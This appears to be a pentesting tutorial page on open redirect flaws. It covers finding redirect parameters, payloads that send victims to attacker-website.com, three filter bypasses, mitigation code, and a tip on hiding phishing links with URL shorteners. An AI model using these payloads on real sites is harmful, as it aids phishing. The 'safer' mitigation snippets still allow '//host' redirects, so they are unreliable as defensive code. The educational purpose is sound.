Open Redirect

What is an Open Redirect Vulnerability?

An open redirect occurs when a flaw in a website’s client-side or server-side code allows an attacker to redirect a user to a malicious site by abusing a legitimate website’s redirect functionality. This is often used in phishing attacks because the victim sees a trusted domain in the URL before being redirected.

Exploitation in Practice

Discovery

Look for URL parameters that look like paths or URLs. For example:

https://site.com/login?ReturnURL=https://site.com/my-account
https://site.com/form-complete?return=/completed
https://site.com/api/v2/redirect?url=https://site.com/404

If there are no obvious parameters, try fuzzing for hidden ones using a tool like ffuf or Burp Suite.

A good parameter wordlist is burp-parameter-names.txt. If you have SecLists installed, you can find it at /usr/share/seclists/Discovery/Web-Content. On Kali Linux, install it with:

apt install seclists

or download it from GitHub: SecLists

Exploitation

If the parameter contains a URL like https://site.com/my-account, change it to your malicious URL:

https://site.com/login?ReturnURL=https://attacker-website.com

If the parameter is a path, like /completed, try replacing it with a full URL. If that fails, use tricks like the username@hostname syntax.

Username@Hostname Bypass

Some sites concatenate the parameter to their own domain, like this:

app.get('/form-complete', (req, res) => {
  var redirectPath = req.query.return;
  res.redirect('https://site.com' + redirectPath);
});

If you pass @attacker-website.com as the parameter, it produces:

Location: https://site.com@attacker-website.com

Browsers interpret site.com as a username, so the request goes to attacker-website.com.

Example request:

GET /form-complete?return=@attacker-website.com HTTP/1.1
Host: site.com

Result: the victim is redirected to the attacker’s site.

Common Defense Evasions

1. Includes Domain

If the application checks that the target URL includes its own domain, bypass it by adding the domain as a parameter to your own site:

https://site.com/login?return=https://attacker-website.com/?foo=site.com

Payload: https://attacker-website.com/?foo=site.com

2. Starts With Domain

If the site checks whether the URL starts with the domain, bypass it with the same username@hostname trick:

https://site.com/login?return=https://site.com@attacker-website.com

Payload: https://site.com@attacker-website.com

3. Blacklist

If the application blacklists http:// and https:// by matching the entire string, you can sometimes bypass it by adding an extra slash:

https://site.com/login?return=https:///attacker-website.com

Payload: https:///attacker-website.com (notice the third slash)

Mitigation

  1. Avoid dynamic redirects when possible; use hardcoded URLs.

  2. If dynamic redirects are needed, prefix the URL with / to enforce an internal path:

    // Safer
res.redirect('/' + path);

// Risky
res.redirect('https://site.com' + path);

  3. Use strict validation with regex or a whitelist of allowed paths:

    re = /^[\w/]+$/;
if (re.test(req.query.return)) {
  res.redirect(req.query.return);
} else {
  res.redirect('/error');
}

Tips

  • Use webhook.site to test your payloads in practice.

  • Burp Suite has extensions specifically for finding open redirects.

  • URL shorteners can help hide malicious redirect URLs in phishing attacks.

PreviousInformation disclosureNextCSRF

Last updated